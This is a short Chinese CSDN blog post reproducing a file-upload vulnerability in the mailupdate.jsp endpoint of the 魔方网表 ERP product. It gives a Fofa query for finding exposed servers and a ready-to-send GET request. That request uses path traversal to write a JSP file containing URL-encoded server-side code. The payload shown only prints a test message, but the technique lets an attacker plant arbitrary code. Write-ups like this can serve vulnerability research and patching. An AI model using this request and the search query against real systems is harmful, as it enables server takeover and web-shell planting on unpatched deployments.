【漏洞复现】魔方网表ERP产品mailupdat文件上传漏洞

146 篇文章 1 订阅

已下架不支持订阅

本文介绍了魔方网表ERP产品中的mailupdate文件上传漏洞,该漏洞可能导致服务器权限被攻击者获取。通过Fofa搜索语法可发现相关问题,漏洞复现包括了漏洞POC和访问URL的拼接。
摘要由CSDN通过智能技术生成

漏洞描述:

魔方网表帮助其搭建了支持信创环境的端到端的一站式数据智能填报系统,实现数据收集模板个性化定义,收集任务集中管控,结构化数据存储、分析及呈现等功能。

魔方网表ERP产品mailupdate存在文件上传漏洞,攻击者可利用漏洞获取服务器权限。

搜索语法:

Fofa-Query: icon_hash="694014318"

漏洞详情:

1.魔方网表ERP产品。

2.漏洞POC:

GET /magicflu/html/mail/mailupdate.jsp?messageid=/../../../test404.jsp&messagecontent=%3C%25%20out.println%28%22Hello%20World%21%22%29%3Bnew%20java.io.File%28application.getRealPath%28request.getServletPath%28%29%29%29
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

已下架不支持订阅

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值